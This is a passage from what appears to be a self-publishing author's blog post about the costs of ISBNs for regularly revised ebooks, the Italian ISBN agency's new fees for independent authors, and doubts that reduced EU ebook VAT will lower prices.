But the problems run deeper, and that's hard to see for most consumers, because they don't realize just how difficult the ISBN system is to navigate. Especially for "live" books like Autotools Mythbuster, every single revision needs its own unique ISBN — and since I usually do three to four updates to the book every year, that would be at least four different ISBNs per year. Add to that the fact that the agencies decided that "ebook" is not a format (ePub, Mobi and PDF are), and you end up requiring multiple ISBNs per revision to cover all the formats.

Assume only two formats are needed for Autotools Mythbuster, which is only available on Amazon and Kobo. Assume three revisions a year (I would like to do more; I plan on spending more of 2015 writing documentation, as I'm doing less hands-on work in Open Source lately). Now you need six ISBNs per year. If I lived in Canada, the problem would be solved to begin with – ISBN assignments in Canada are free – but I live in Ireland, and Nielsen is a for-profit company (I'll leave Italy aside for a moment and come back to it later). If I were to buy a block of 10 codes (the minimum amount), I would have to pay £120 plus VAT, and that would last me almost two years — which requires making some €300-400 in royalties over those two years just to break even on the up-front cost, since there are taxes to be paid on the royalties, you know.

This means well over two hundred copies of the book have to be sold — I would love that, but I'm sure there aren't that many people interested in what I write. And not two hundred once, but two hundred every year — every update has a hidden cost due to the ISBNs needing to be updated, and if you provide the update for free (as I want to do), then you need to sell that many more copies incrementally.

Now, I said above I'd leave Italy aside — here is why: up until now, the Italian agency for ISBN assignment only allowed publishers to buy blocks of ISBN codes — independent authors had no choice and could not get an ISBN at all. It probably has something to do with the fact that the agency is owned by the Italian publishers' association (Associazione Italiana Editori). Admittedly, the price is quite a bit more affordable if you are a publisher: it is €30 to join and €50 per 10 codes.

But of course, with the new law coming into effect, it would have been too much of a discrimination against independent authors not to allow them to get ISBNs at all. So the agency decided that starting this January (or rather, starting next week, as they are on vacation until the 7th) they will hand out individual ISBNs for "authorpublishing" — sic, in English; I wonder how drunk they were to come up with such a term, when the globally used term would be self-publishing. Of course, the fee for those is €25 per code, five times as much as a publisher would pay.

And there is no documentation on how to apply for those yet, because of course they are still on vacation (January 6th is a holiday in Italy; it's common for companies, schools, etc. to take the whole first week of the year off), and of course they only started providing the numbers when the law entered into effect, to avoid the discrimination. But it means that until authors can find the time to look into the needed documentation, they will be discriminated against. Again, only in Italy, as the rest of Europe does not have any such silly rule.

Now, at least one friend of mine was happy that at least for the majority of ebooks we'll see reduced VAT — but will we? I doubt it: as with any VAT change, prices will likely remain the same. When VAT increased from 20% to 21%, stores advertised the increased prices for a week, then went back to what they were before — because something priced at €3.99 wouldn't stay priced at €4.02 for long; it's not even a convenient number. In this case, I doubt that any publisher will change their MSRP for ebooks to match the reduced VAT. I think the only place where this is going to make a difference is Amazon, as their KDP interface now matches the US price to the ex-VAT price of the books, so that prices across Amazon websites no longer match across markets once the local VAT is applied. But I wouldn't be surprised if publishers still set an MSRP on Amazon to match the same in-VAT price before and after the 22%→4% change, essentially increasing their margin by over 10%.

I'm definitely unconvinced of the new VAT regulations in Europe; they are essentially designed as a protectionistic measure for the various countries' companies for online services. But right now they are just making it more complex for all the final customers to figure out how much they are paying, and Italy in particular they seem to just be trying to ruin the newly-renewed independent authors' market which has been, to me, a nice gift of modern ebook distribution.